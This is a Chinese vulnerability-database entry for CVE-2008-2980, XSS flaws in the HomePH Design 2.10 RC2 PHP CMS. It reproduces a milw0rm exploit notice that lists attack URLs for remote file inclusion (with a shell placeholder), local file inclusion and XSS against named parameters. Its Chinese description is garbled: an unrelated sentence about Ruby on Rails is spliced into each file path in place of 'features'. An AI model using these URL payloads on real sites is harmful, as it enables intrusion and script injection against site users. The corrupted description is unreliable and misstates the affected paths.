homeph_design 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115513 漏洞类型 跨站脚本
发布时间 2008-06-22 更新时间 2008-07-02
CVE编号 CVE-2008-2980 CNNVD-ID CNNVD-200807-037
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/5903
https://www.securityfocus.com/bid/81011
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-037
|漏洞详情
HomePHDesign是一个开源的基于php的CMS系统。HomePHDesign2.10RC2存在多个跨站脚本攻击漏洞,远程攻击者通过(1)对admin/RubyonRails(Rails)是一个使用Ruby语言写的开源Web应用框架。features是其中的一个文本解析器。/register/register.php的error_meldung参数,(2)对admin/RubyonRails(Rails)是一个使用Ruby语言写的开源Web应用框架。features是其中的一个文本解析器。/memberlist/memberlist.php的feature_language[ueberschrift]参数,(3)对admin/RubyonRails(Rails)是一个使用Ruby语言写的开源Web应用框架。features是其中的一个文本解析器。/lostpassword/lostpassword.php的language_array[ueberschrift]参数,(4)对admin/RubyonRails(Rails)是一个使用Ruby语言写的开源Web应用框架。features是其中的一个文本解析器。/kalender/eingabe.php的language_feature[titel]参数,以及(5)对admin/RubyonRails(Rails)是一个使用Ruby语言写的开源Web应用框架。features是其中的一个文本解析器。/fotogalerie/eingabe.php的language_feature[bildmenu]参数,以注入任意web脚本或HTML。
|漏洞EXP
???????????????????????????????????????????????????????????????????????????????
??                             C r a C k E r                                ??
??          T H E   C R A C K   O F   E T E R N A L   M I G H T             ??
??????????????????????????????????????????????????????????????????????????????

 ?????      From The Ashes and Dust Rises An Unimaginable crack....      ?????
??????????????????????????????????????????????????????????????????????????????
??       [ Remote File Include ]   [ Local File Include ]   [XSS]           ??
??????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                : :                                    :
?   Group    : uNiTeD CraCkiNg ForCE  ? ?                                    ?
?   Script   : HomePH Design 2.10 RC2 ? ?         Register Globals :         ?
?   Download : SourceForge.net        ? ?                                    ?
?   Method   : GET                    ? ?          [?] ON   [ ] OFF          ?
?   Critical : High [????????]        ? ?                                    ?
?   Impact   : System access          ? ?                                    ?
? ????????????????????????????????????? ???????????????????????????????????? ?
?                              DALnet #crackers                             ??
??????????????????????????????????????????????????????????????????????????????
:                                                                            :
?  Release Notes:                                                            ?
?  ?????????????                                                             ?
?  Typically used for remotely exploitable vulnerabilities that can lead to  ?
?  system compromise.                                                        ?
?                                                                            ?

??????????????????????????????????????????????????????????????????????????????
??                             Exploit URL's                                ??
??????????????????????????????????????????????????????????????????????????????
  

[RFI]

http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[SHELL]

[LFI]

http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[LFI]
http://localhost/path/admin/features/account/account.php?language=[LFI]
http://localhost/path/admin/features/downloads/downloads.php?language=[LFI]
http://localhost/path/admin/features/forum/forum.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/delete.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/fotogalerie.php?language=[LFI]

[XSS]

http://localhost/path/admin/features/register/register.php?error_meldung=[XSS]
http://localhost/path/admin/features/memberlist/memberlist.php?feature_language[ueberschrift]=[XSS]
http://localhost/path/admin/features/lostpassword/lostpassword.php?language_array[ueberschrift]=[XSS]
http://localhost/path/admin/features/kalender/eingabe.php?language_feature[titel]=[XSS]
http://localhost/path/admin/features/fotogalerie/eingabe.php?language_feature[bildmenu]=[XSS]

   Notes: More files are infected.
   ?????

??????????????????????????????????????????????????????????????????????????????
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS

??????????????????????????????????????????????????????????????????????????????
??                              © CraCkEr 2008                              ??
??????????????????????????????????????????????????????????????????????????????

# milw0rm.com [2008-06-22]
|受影响的产品
HomePH Design HomePH Design 2.10 RC2
|参考资料

来源:XF
名称:homephdesign-multiple-scripts-xss(43260)
链接:http://xforce.iss.net/xforce/xfdb/43260
来源:MILW0RM
名称:5903
链接:http://www.milw0rm.com/exploits/5903